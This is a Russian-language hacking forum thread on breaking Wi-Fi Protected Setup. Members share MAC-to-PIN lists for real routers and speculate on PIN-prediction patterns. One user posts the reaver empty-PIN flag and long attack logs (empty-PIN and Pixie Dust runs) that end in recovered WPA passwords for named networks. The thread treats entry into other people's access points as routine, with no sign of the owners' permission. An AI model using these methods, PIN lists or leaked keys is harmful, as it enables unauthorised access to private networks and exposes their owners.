Уязвимость в протоколе Wi-Fi Protected Setup

Обсуждение в разделе «Беспроводные технологии/Wi-Fi/Wardriving», начал(-а) gpuhash, 30.12.2011.

  1. binarymaster

    binarymaster Elder - Старейшина

    Регистрация:
    11.12.2010
    Сообщения:
    3 367
    Одобрения:
    5 952
    Репутация:
    59
    Мы здесь не экстрасенсы. Уровень RSSI сигнала? Какое приложение используете для коннекта?
     
  2. ms13

    ms13 Level 8

    Регистрация:
    19.06.2015
    Сообщения:
    1 564
    Одобрения:
    5 549
    Репутация:
    87
    Ой, да ну его...
    Он там с какой-то андроид перделки пытается подключиться, говорит, получает ошибку, что сигнал слабый, но на самом деле сигнал норм.
     
  3. binarymaster

    binarymaster Elder - Старейшина

    Регистрация:
    11.12.2010
    Сообщения:
    3 367
    Одобрения:
    5 952
    Репутация:
    59
    А, ну с этим всё ясно. Впрочем, ничего нового.
     
    Это одобряет fffsfs.
  4. Ana1rebus

    Ana1rebus New Member

    Регистрация:
    24.08.2017
    Сообщения:
    2
    Одобрения:
    0
    Репутация:
    0
    Помогите ребят,keenetic 28:28:5d:ed:dd:ce
     
  5. Stas956457

    Stas956457 New Member

    Регистрация:
    23.12.2016
    Сообщения:
    10
    Одобрения:
    0
    Репутация:
    0
  6. TOX1C

    TOX1C Member

    Регистрация:
    24.03.2012
    Сообщения:
    628
    Одобрения:
    612
    Репутация:
    7
    Еще один интересный кусок тп-линков в базе нашел. Если последний символ совпадает, а в маке различается предпоследний, то и первая цифра пина или совпадет, или будет +- 1.
    Не совпадение, уже не первый такой блок находил в базе.

    F8:1A:67:C3:37_6A 65399644
    F8:1A:67:C3:37_DA 61564862
    F8:1A:67:C3:37_FA 51835606

    F8:1A:67:C3:37_BC 77362926
    F8:1A:67:C3:37_3C 66252450

    у этих не сходится начало, но сходится паттерн

    F8:1A:67:C3:37:E2 49292534
    F8:1A:67:C3:37:72 07570698

    может еще чего нить интересного найду.
     
  7. TOX1C

    TOX1C Member

    Регистрация:
    24.03.2012
    Сообщения:
    628
    Одобрения:
    612
    Репутация:
    7
    И на закуску красивый мак и красивый пин от нее

    90:f6:52:aa:ec:af 91916167 wa701nd
    в базе в этом диапазоне все с wifi map, а жаль, там 2 интересные точки есть.
    ищем что то похожее в базе
    64:66:b3:36:3f:ca 81817177 wr740n
    и сразу
    64:66:B3:36:36:F2 28583653
    64:66:B3:36:33:F6 37573027
    64:66:B3:36:3B:54 47461512 (!!)
    64:66:B3:36:38:EA 72747018
    5 точек с одной маской


    совпала последняя цифра - совпало начало.
    64:66:B3:36:39:22 03793930
    64:66:B3:36:39:52 07217470
    64:66:B3:36:30:92 09469594

    64:66:B3:36:39:54 21705052
    64:66:B3:36:3B:44 21895944
    64:66:B3:36:39:14 25091137

    64:66:B3:36:3B:54 47461512
    64:66:B3:36:3A:64 49212716
    64:66:B3:36:39:44 50371976
    тут наблюдается другое - чем ниже 3 с конца число, тем больше сам пин (в = 47; а = 49; 9 = 50). то же и в других блоках попадается, но не всегда.

    еще

    64:66:B3:2D:C9:14 68683030 wa830re
    и в базе
    64:66:B3:2D:C2:FA 63621914 (?? почему опять 4 цифра отличается на -1 как и в прошлом примере??)
    64:66:B3:2D:C9:E5 05054442

    чтобы рыть дальше, нужен дамп всех туполинков с базы в формате mac-pin, а еще больше нужна помощь человека с мозгами.
     
  8. carartem02

    carartem02 Member

    Регистрация:
    8.11.2015
    Сообщения:
    328
    Одобрения:
    121
    Репутация:
    0
    На D-Link DIR-815 (пробил по 3wifi) не получается получить пароль (имея валидный пин)
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [+] Quitting after 1 crack attempts
    [-] Failed to recover WPA key
    [*] String pin was specified, nothing to save.
    В чём проблема может быть?
     
  9. antis17

    antis17 Member

    Регистрация:
    25.04.2017
    Сообщения:
    71
    Одобрения:
    163
    Репутация:
    4
    Что мешает подключиться с помощью PIN и потом посмотреть пароль?
     
  10. binarymaster

    binarymaster Elder - Старейшина

    Регистрация:
    11.12.2010
    Сообщения:
    3 367
    Одобрения:
    5 952
    Репутация:
    59
    Мешает то, что "подключиться с помощью PIN" есть ничто иное, как получить пароль с помощью PIN, и затем подключиться с этим паролем, что человек выше и пытается проделать.
    Многие подобные на NRU прошивке не отдают пароль даже по правильному пину. Но иногда на них пароль совпадает с этим пином.
     
    Это одобряет carartem02.
  11. fffsfs

    fffsfs Member

    Регистрация:
    17.01.2017
    Сообщения:
    278
    Одобрения:
    12
    Репутация:
    0
    Я имел ввиду с чем едят!
     
  12. fffsfs

    fffsfs Member

    Регистрация:
    17.01.2017
    Сообщения:
    278
    Одобрения:
    12
    Репутация:
    0
    Наверно пароль :
    Nadezhda
     
  13. fffsfs

    fffsfs Member

    Регистрация:
    17.01.2017
    Сообщения:
    278
    Одобрения:
    12
    Репутация:
    0
    f8:1a:67:54:6e:dede
    Почему пинов в 3wifi нет, вроде WPA
     
  14. binarymaster

    binarymaster Elder - Старейшина

    Регистрация:
    11.12.2010
    Сообщения:
    3 367
    Одобрения:
    5 952
    Репутация:
    59
    Потому что TP-LINK TL-WR941N.
     
    Это одобряют fffsfs и carartem02.
  15. TOX1C

    TOX1C Member

    Регистрация:
    24.03.2012
    Сообщения:
    628
    Одобрения:
    612
    Репутация:
    7
    И еще немножко совпадений
    E8:94:F6:2E:CB:10 64484570
    E8:94:F6:2E:CB:80 65445181
    тут конец не совпал, но пин близок к предыдущим.
    E8:94:F6:2E:CB:F4 69438813
     
  16. binarymaster

    binarymaster Elder - Старейшина

    Регистрация:
    11.12.2010
    Сообщения:
    3 367
    Одобрения:
    5 952
    Репутация:
    59
    Новости в сфере пин кодов.

    Маршрутизаторы D-Link DIR-620 от Ростелекома (BSSID E4:6F:13:*) уязвимы к пустому пин коду. :)

    Проверено на практике:
    https://forum.antichat.ru/posts/4122981
     
  17. binarymaster

    binarymaster Elder - Старейшина

    Регистрация:
    11.12.2010
    Сообщения:
    3 367
    Одобрения:
    5 952
    Репутация:
    59
    И роутеры ZTE ZXHN H118N тоже! :cool:

    Code:
    [*] Audit started.
    [*] Associating with AP...
    [+] Associated successfully.
    [*] Trying pin ""...
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [*] Received WPS Message M1.
    [*] E-Nonce: 6DDA2C0103BB28624169DCAC0B4D3D20
    [*] PKE: D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A328C0E1BAF8CF91664371174C08EE12EC92B0519C54879F21255BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5D966A5A490472CEBA9E3B4224F3D89FB2B
    [*] Manufacturer: ZTE Corporation
    [*] Model Name: ZXHN H118N
    [*] Model Number: ZXHN H118N
    [*] Serial Number: 123456789012347
    [*] Device Name: ADSL Modem/Router
    [*] Sending WPS Message M2...
    [*] R-Nonce: 733D35864C79F206ABBED593FEB8A6EA
    [*] PKR: CE733463B55D3C410E59949D94F0B95FFF816DC2CBD27F0832F010121143F37FEBE96A22E7B43C1A4CCE45BBCDFE48A55BCACE804C0643286208DE9F620C9F8DF6B91D1F1AD7EB9398B49E28CCFA1349DFCB11943A6D6F40FC52C76BEDB2FECC516906A4C4FFF0C10AE337EF9F82E9AA4B695B3707256B4E13CEEA0E19B29E2B35BDFA8E09BD60F2B3FF78E9B3BD2A0A7D97B633A0046134BFC03C18AADA6A002C60709A56191DB258025C9249BB0668BFE45078F4AAA32E937FB88A802850BC
    [*] AuthKey: 06C01B8D83A4B25EA741980E912F59F3687D22D277526F7F12774BDECDBB16E0
    [*] Received WPS Message M3.
    [*] E-Hash1: 2FA02BFDBE2FC4010C6C655870CC8FABB651F930401C61BB23C28A04597F163F
    [*] E-Hash2: 2FA02BFDBE2FC4010C6C655870CC8FABB651F930401C61BB23C28A04597F163F
    [*] Sending WPS Message M4...
    [*] Received WPS Message M5.
    [+] First half found: <empty>
    [*] Sending WPS Message M6...
    [*] Received WPS Message M7.
    [*] Sending WSC NACK...
    [-] Request timed out.
    [*] Sending WSC NACK...
    [-] Request timed out.
    [*] Sending WSC NACK...
    [-] Session timed out.
    [+] WPS PIN: <empty>
    [+] SSID: RT-WiFi_46FC
    [+] Key: 9035000440
    [+] Key Index: 01
    [*] Audit stopped.
     
  18. binarymaster

    binarymaster Elder - Старейшина

    Регистрация:
    11.12.2010
    Сообщения:
    3 367
    Одобрения:
    5 952
    Репутация:
    59
    А ещё D-Link DIR-825AC, и заметьте, с каким упорством, но добылась!

    Code:
    [*] Audit started.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [+] Associated successfully.
    [*] Trying pin "06540883"...
    [*] Sending EAPOL Start...
    [-] Request timed out.
    [*] Trying pin "06540883"...
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [*] Received WPS Message M1.
    [*] E-Nonce: A4D079E8DC0FFF2BED9BFBB6F769E775
    [*] PKE: D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A328C0E1BAF8CF91664371174C08EE12EC92B0519C54879F21255BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5D966A5A490472CEBA9E3B4224F3D89FB2B
    [*] Manufacturer: D-Link Systems
    [*] Model Name: DIR-825AC
    [*] Model Number: DIR-825AC
    [*] Serial Number: 123456789012347
    [*] Device Name: DIR-825AC
    [*] Sending WPS Message M2...
    [*] R-Nonce: 956581FBC3D8332D6CF673EC84B7FD1B
    [*] PKR: F5F72C0DD8C32129A0D59E340636D4F3D59DAF36EFD39C73EF021CB2501BAA13D56C67994EEB4A266DA44EB0D9E1FA34A5422CA5B359686A8F80336705E5E5F772BEBE9C421CEF21EFAC70D778580E66CD5753EF5A62DA91CFD68469FB87469860BA76BD18B2EB2B0454554154EE4700D68D0143CAAC08E51B02E7EC3A6A2B96D8F77A541CD5CBDDB1CD8F750A823F8B83E6CFFA142BB3798980D59C03E355B931D2A311DE78C4D2494CE87E9D42C85ACB39F747454946C313F68F9EDE425372
    [*] AuthKey: 9F5DB6F5AC0CE6C1C71259C251DB57AE6321302AABEE76277BB0D67D3DB7AAA7
    [*] Received WPS Message M1.
    [*] E-Nonce: A4D079E8DC0FFF2BED9BFBB6F769E775
    [*] PKE: D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A328C0E1BAF8CF91664371174C08EE12EC92B0519C54879F21255BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5D966A5A490472CEBA9E3B4224F3D89FB2B
    [*] Sending WPS Message M2...
    [*] R-Nonce: 956581FBC3D8332D6CF673EC84B7FD1B
    [*] PKR: F5F72C0DD8C32129A0D59E340636D4F3D59DAF36EFD39C73EF021CB2501BAA13D56C67994EEB4A266DA44EB0D9E1FA34A5422CA5B359686A8F80336705E5E5F772BEBE9C421CEF21EFAC70D778580E66CD5753EF5A62DA91CFD68469FB87469860BA76BD18B2EB2B0454554154EE4700D68D0143CAAC08E51B02E7EC3A6A2B96D8F77A541CD5CBDDB1CD8F750A823F8B83E6CFFA142BB3798980D59C03E355B931D2A311DE78C4D2494CE87E9D42C85ACB39F747454946C313F68F9EDE425372
    [*] AuthKey: 9F5DB6F5AC0CE6C1C71259C251DB57AE6321302AABEE76277BB0D67D3DB7AAA7
    [*] Received WPS Message M3.
    [*] E-Hash1: D88F7A4B3387DBC49FB4B5338708046A23106EFFFC75456CC64AB1A22A236D4C
    [*] E-Hash2: 4B7E9E88690957B81698F2C14111757F0467AF1B9531DF88380530B17A5B6752
    [*] Sending WPS Message M4...
    [*] Received WSC NACK.
    [-] Error: Wrong PIN code.
    [*] Sending WSC NACK...
    [*] EAP session closed.
    [*] Starting Pixie Dust attack...
    [-] Pixie Dust PIN not found.
    [*] Trying pin ""...
    [*] Sending EAPOL Start...
    [-] Request timed out.
    [*] Trying pin ""...
    [*] Sending EAPOL Start...
    [+] Associated successfully.
    [-] Request timed out.
    [*] Reconnecting...
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [+] Associated successfully.
    [*] Trying pin ""...
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [-] Request timed out.
    [*] Sending Identity Response...
    [-] Request timed out.
    [*] Sending Identity Response...
    [-] Session timed out.
    [*] Trying pin ""...
    [+] Associated successfully.
    [*] Reconnecting...
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [+] Associated successfully.
    [*] Trying pin ""...
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [-] Request timed out.
    [*] Sending Identity Response...
    [-] Request timed out.
    [*] Sending Identity Response...
    [-] Session timed out.
    [*] Trying pin ""...
    [+] Associated successfully.
    [*] Reconnecting...
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [+] Associated successfully.
    [*] Trying pin ""...
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [-] Request timed out.
    [*] Sending Identity Response...
    [-] Request timed out.
    [*] Sending Identity Response...
    [+] Associated successfully.
    [-] Request timed out.
    [*] Reconnecting...
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [+] Associated successfully.
    [*] Trying pin ""...
    [*] Sending EAPOL Start...
    [-] Request timed out.
    [*] Trying pin ""...
    [*] Sending EAPOL Start...
    [-] Request timed out.
    [*] Trying pin ""...
    [*] Sending EAPOL Start...
    [-] Request timed out.
    [*] Trying pin ""...
    [*] Sending EAPOL Start...
    [-] Request timed out.
    [*] Trying pin ""...
    [*] Sending EAPOL Start...
    [-] Request timed out.
    [*] Trying pin ""...
    [+] Associated successfully.
    [*] Reconnecting...
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [+] Associated successfully.
    [*] Trying pin ""...
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [-] Request timed out.
    [*] Sending Identity Response...
    [-] Request timed out.
    [*] Sending Identity Response...
    [-] Session timed out.
    [*] Trying pin ""...
    [*] Sending EAPOL Start...
    [-] Request timed out.
    [*] Trying pin ""...
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [-] Request timed out.
    [*] Sending Identity Response...
    [-] Request timed out.
    [*] Sending Identity Response...
    [+] Associated successfully.
    [-] Request timed out.
    [*] Reconnecting...
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [+] Associated successfully.
    [*] Trying pin ""...
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [-] Request timed out.
    [*] Sending Identity Response...
    [-] Request timed out.
    [*] Sending Identity Response...
    [-] Session timed out.
    [*] Trying pin ""...
    [*] Sending EAPOL Start...
    [-] Request timed out.
    [*] Trying pin ""...
    [*] Sending EAPOL Start...
    [+] Associated successfully.
    [-] Request timed out.
    [*] Reconnecting...
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [+] Associated successfully.
    [*] Trying pin ""...
    [*] Sending EAPOL Start...
    [-] Request timed out.
    [*] Trying pin ""...
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [*] Received WPS Message M1.
    [*] Sending WPS Message M2...
    [*] Received WPS Message M1.
    [*] Sending WPS Message M2...
    [-] Request timed out.
    [*] Sending WPS Message M2...
    [*] Received WPS Message M3.
    [*] Sending WPS Message M4...
    [*] Received WPS Message M3.
    [*] Sending WPS Message M4...
    [*] Received WPS Message M5.
    [+] First half found: <empty>
    [*] Sending WPS Message M6...
    [*] Received WPS Message M5.
    [+] First half found: <empty>
    [*] Sending WPS Message M6...
    [-] Request timed out.
    [*] Sending WPS Message M6...
    [*] Received WPS Message M7.
    [*] Sending WSC NACK...
    [*] EAP session closed.
    [+] WPS PIN: <empty>
    [+] SSID: Liliya
    [+] Key: 8 <спрятал номер телефона>
    [+] Key Index: 01
    [*] Audit stopped.
    
     
  19. Vovan19

    Vovan19 Member

    Регистрация:
    12.09.2016
    Сообщения:
    67
    Одобрения:
    29
    Репутация:
    0
    Как выглядит команда reaver в kali 2 для взлома без wps pin?
     
  20. binarymaster

    binarymaster Elder - Старейшина

    Регистрация:
    11.12.2010
    Сообщения:
    3 367
    Одобрения:
    5 952
    Репутация:
    59
    С флагом -p "" (несколько страниц назад было).

    А ещё я тут внезапно нашёл Sercomm RV6688BCM, которые обычно поддаются Pixie Dust... но на этот раз попался с пустым пином! o_O

    Code:
    [*] Audit started.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [+] Associated successfully.
    [*] Trying pin "12345670"...
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [*] Received WPS Message M1.
    [*] E-Nonce: 136F70913C5A8B74225978490E93239C
    [*] PKE: 0FB2D266E52270D3864CA09700FD11124283FCF835118C455512192D398729C2C7B9AAA3E49A87ADEDA99DB0872E6295CBC188AA18E7E54B83D75FB2632EF786D76E8296B13E9AAFD55ECBD521B08E394DD01B623B4A49F2F3D112EA0CE1611974C527B0EF25DC739D2500AEEAEA2E65DCA7E264D5CD231E20B4B495C003E8FBC3C440B2BB2BFDE8BBF34EE2970F60FDF425D4198C35417111A01DBDF04E2A465F1C80AB502B64D52A7714327B93F39DBC0173BE280B78EB593FA5F130B1CC8E
    [*] Manufacturer: SERCOMM
    [*] Model Name: RV6688BCM
    [*] Model Number: RV6688BCM
    [*] Serial Number: 53434F4D14104997
    [*] Device Name: RV6688BCM
    [*] Sending WPS Message M2...
    [*] R-Nonce: 4B82C0F1E6431FBD116BB37870AE2B4E
    [*] PKR: 971CB3AC567472A7C62FBAD38998FE84F769E4F18602D9BBFE0667C0FD4EDD88AECCF65C24CD0E1A8F5DF0B33068CD2D5258A12E92909F9008B45858BE716C924AC2ABF6C29BA8DEA801BD77BD8DA8A5EB9C7392B508C28C36CFDB43CC1469DFDFE3BB7DB29D5F5F8DA257FF6B802B66068D8242F9A3125AC64796141D0BC7EE3D9BCBF2FD3A7D1B19A53183B41E6654A6A1BA946D4D71E55D25A1E2925606FAE6BA5FA2828FD3B98BF39801F1E1844742F93C5068B9E9A40CF2444BB07E6DD4
    [*] AuthKey: CA808543C03093432C15F8AAF2C7D7414A63065E9D9C0E0216DBE88E008E54EF
    [*] Received WPS Message M3.
    [*] E-Hash1: E56F292D3C9BE82A8702EB2A1435F9CC404ABE8D7E7737D72946FB09D4FBAD75
    [*] E-Hash2: E56F292D3C9BE82A8702EB2A1435F9CC404ABE8D7E7737D72946FB09D4FBAD75
    [*] This AP is potentially vulnerable to the "empty string" pin.
    [*] To specify <empty> pin, add empty line to PINs list and disable checksum calculation.
    [*] Also in this case the pin can have two same halfs (e.g. 00000000).
    [*] Sending WPS Message M4...
    [*] Received WSC NACK.
    [-] Error: Wrong PIN code.
    [*] Sending WSC NACK...
    [-] Request timed out.
    [*] Sending WSC NACK...
    [-] Request timed out.
    [*] Sending WSC NACK...
    [-] Session timed out.
    [*] Starting Pixie Dust attack...
    [*] The AP /might be/ vulnerable.
    [*] Try again with --force or with another (newer) set of data.
    [*] Also ensure that the date time and time zone on your computer are set correctly.
    [*] Audit stopped.
    [*] Audit started.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [+] Associated successfully.
    [*] Trying pin ""...
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [*] Received WPS Message M1.
    [*] E-Nonce: 53DDC768720082F141C35BF4051E4F48
    [*] PKE: 2DC9A4EE82191F650548A09FE72993E75FC33944454D54D36C1A94C413F9AE3698245EB9C0BD5758E97CD15DD7264B19E22E088D567077D8883835B1F206A29E26C123949F8E8F1ED719FF49C92B1A778EDB3AB32174862451C5A8A978552D907FFFF2E759B120B1067664101C482A7321C5EA020F8DBDAAB06AC4FA55EA96F5EFE3C919FD7198EE5AD9512C97B91930A36E0FEECF5390DB8ABFA62FE922D312887F0CACF2EFEB6B2B20F0E2D3E9CDE34F79B87F352932D8D69389B248475803
    [*] Manufacturer: SERCOMM
    [*] Model Name: RV6688BCM
    [*] Model Number: RV6688BCM
    [*] Serial Number: 53434F4D14104997
    [*] Device Name: RV6688BCM
    [*] Sending WPS Message M2...
    [*] R-Nonce: 0A5920DB91A74631739A26BE87711D96
    [*] PKR: 6A23E76D3D13B67BA56AEC2277580CE736567A0AD400EE03DED57CFD0454D6A1436F6309A2E33FF9404D376F10B65E5D01CC30E9DE9CB4DD1A625A11A59A2D7179D46DF1749A659799B5C23263D87225F9363C53F64C84750B34175AFC7AB2DBD3EB6092EE5C703F3245B5E2C2A071EF6D5439A5D8AB53D5F34608E2984FCA19829D9D1FBF2FA185A60F3173BF9111777054B7C9E616AB2061DE255F92550100A6B7F65F7623878384F0B2FDE8AE37D5D82D0FD59A3C3A1186CD2CA5DFE6DB03
    [*] AuthKey: 23DB14DBE508E911E4B185298C17B168EBB3AA7A6FB7369FCB7D2A9DE589CADC
    [*] Received WPS Message M3.
    [*] E-Hash1: 8799E7C5674192252389D749E42801B8C1BD47BE6904CE96274223FE05EE22A3
    [*] E-Hash2: 8799E7C5674192252389D749E42801B8C1BD47BE6904CE96274223FE05EE22A3
    [*] Sending WPS Message M4...
    [*] Received WPS Message M5.
    [+] First half found: <empty>
    [*] Sending WPS Message M6...
    [*] Received WPS Message M7.
    [*] Sending WSC NACK...
    [*] EAP session closed.
    [+] WPS PIN: <empty>
    [+] SSID: MGTS_GPON_4997
    [+] Key: XSA6P4XF
    [+] Key Index: 1
    [*] Audit stopped.
    

    RS оповещает о потенциальном пустом пине, да. :)
     
Загрузка...
Похожие темы
  1. Ответы:
    35
    Просмотры:
    7 040
  2. Ответы:
    1
    Просмотры:
    1 517
  3. Ответы:
    1
    Просмотры:
    891
  4. Ответы:
    2
    Просмотры:
    514
  5. Ответы:
    17
    Просмотры:
    1 865
  6. Ответы:
    0
    Просмотры:
    658
  7. Ответы:
    2
    Просмотры:
    1 590